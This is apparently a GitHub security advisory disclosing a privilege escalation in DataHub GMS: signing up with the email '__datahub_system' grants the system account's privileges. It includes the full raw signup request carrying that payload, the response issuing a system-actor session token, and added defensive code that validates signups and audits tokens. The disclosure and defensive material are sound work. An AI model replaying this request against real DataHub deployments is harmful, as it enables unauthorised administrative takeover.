
Privilege Escalation to system user through user signup

High
jjoyce0510 published GHSA-mcrw-j7x9-x556 Sep 20, 2024

Package

Datahub GMS (Datahub GMS)

Affected versions

<= v0.10.2

Patched versions

>= 0.12.1

Description

Summary

Missing input validation in the user signup form allows an attacker to register an account whose "email" field is __datahub_system, which then becomes the account's actor id.
An attacker holding a valid invite token can create such an account and thereby elevate their privileges to those of the system account.

Details

  • Tested with the Datahub quickstart docker-compose file.
  • Tested on version v0.10.2
  • Tested with the environment variable METADATA_SERVICE_AUTH_ENABLED=true set in both the frontend and the GMS container.


PoC

The raw HTTP signup request and response are reproduced in the "References" section at the end.

  1. The attacker requires a valid invite token. The following screenshot illustrates how an invite token with "No Role" is created.

[screenshot]

  2. The attacker signs up a user with the email __datahub_system. The account creation succeeds and the attacker receives a valid session cookie/token for the __datahub_system actor (see the following screenshot).

[screenshot]

  3. The attacker can use this cookie to access administrative APIs, for example to create an access token for the __datahub_system account.

[screenshot]

Impact

This is a privilege escalation vulnerability: an attacker holding a valid invite token can elevate their privileges from No Role to __datahub_system.
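As an added example (not DataHub's own code), the check the signup handler was missing, alongside a session-token audit a defender could run over frontend logs. The reserved id, the field names and the request body come from this advisory; the function names, the address regex and the "__"-prefix rule are assumptions.

```python
import base64
import json
import re

# Actor ids that self-service signup must never be allowed to claim;
# "__datahub_system" is the one the advisory demonstrates.
RESERVED_ACTOR_IDS = {"__datahub_system"}

# Local part, "@", dotted domain. The vulnerable flow accepted the bare string
# "__datahub_system" as an "email" and minted urn:li:corpuser:<email> from it.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")

# The signup body from the advisory's References section (the input to reject).
ADVISORY_BODY = {"fullName": "test3", "email": "__datahub_system",
                 "password": "attackerPassword!", "title": "Data Scientist",
                 "inviteToken": "onyyqvpbgchmyosptbwlimylughnnrbc"}

def validate_signup(body: dict) -> list:
    """Return the reasons a signup body must be rejected (empty list = accept)."""
    errors = []
    email = str(body.get("email", "")).strip()
    if not EMAIL_RE.fullmatch(email):
        errors.append("email is not a well-formed address")
    # Check the exact value that becomes the corpuser id, case-insensitively;
    # also rejecting any "__"-prefixed id is a conservative choice assumed here.
    if email.lower() in RESERVED_ACTOR_IDS or email.startswith("__"):
        errors.append("email collides with a reserved actor id")
    return errors

def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def session_claims(jwt: str) -> dict:
    """Decode a DataHub session JWT payload. No signature check: this is for
    auditing tokens the service already issued, not for accepting them."""
    _header, payload, _signature = jwt.split(".")
    return json.loads(_b64url_decode(payload))

def flag_system_session(jwt: str) -> bool:
    """True if a SESSION token names a reserved actor. Login and signup should
    never issue one, so a hit in frontend logs is worth an alert."""
    claims = session_claims(jwt)
    return claims.get("type") == "SESSION" and claims.get("actorId") in RESERVED_ACTOR_IDS

def make_unsigned_token(claims: dict) -> str:
    """Build a token in the advisory's shape for testing (constructed, unsigned)."""
    def enc(d):
        return base64.urlsafe_b64encode(
            json.dumps(d, separators=(",", ":")).encode()).decode().rstrip("=")
    return f"{enc({'alg': 'HS256'})}.{enc(claims)}.sig"
```

The PLAY_SESSION token in the response below carries the same claims shape (actorId, type, sub, exp, iss), so flag_system_session applies to it directly.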

References

Signup HTTP request

POST /signUp HTTP/1.1
Host: localhost:9002
Content-Length: 149
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "macOS"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Testuser1
Content-Type: application/json
Accept: */*
Origin: http://localhost:9002
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9002/signup?invite_token=onyyqvpbgchmyosptbwlimylughnnrbc
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: bid=f5cf3cbe-752b-44f1-b61a-33d32e01b067
Connection: close

{"fullName":"test3","email":"__datahub_system","password":"attackerPassword!","title":"Data Scientist","inviteToken":"onyyqvpbgchmyosptbwlimylughnnrbc"}

Signup HTTP response

HTTP/1.1 200 OK
Set-Cookie: PLAY_SESSION=41fdaca382e66e81909d903c83d24cc6f633299c-actor=urn%3Ali%3Acorpuser%3A__datahub_system&token=eyJhbGciOiJIUzI1NiJ9.eyJhY3RvclR5cGUiOiJVU0VSIiwiYWN0b3JJZCI6Il9fZGF0YWh1Yl9zeXN0ZW0iLCJ0eXBlIjoiU0VTU0lPTiIsInZlcnNpb24iOiIxIiwianRpIjoiYTc2OTA4MjQtMzVmZC00OWQ5LWIwZTMtN2EyMmQ0NjFkZGQ5Iiwic3ViIjoiX19kYXRhaHViX3N5c3RlbSIsImV4cCI6MTY4MjY3NDg0OCwiaXNzIjoiZGF0YWh1Yi1tZXRhZGF0YS1zZXJ2aWNlIn0.E7_x2Wta9Wlp3NT98D3WZwtogGr5dIpbRahjaJWYZEQ; SameSite=Lax; Path=/; HTTPOnly
Set-Cookie: actor=urn:li:corpuser:__datahub_system; Max-Age=2592000; Expires=Sat, 27 May 2023 09:40:48 GMT; SameSite=Lax; Path=/
Date: Thu, 27 Apr 2023 09:40:48 GMT
Connection: close
Content-Length: 0

Severity

High


CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: Low
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID

No known CVE

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
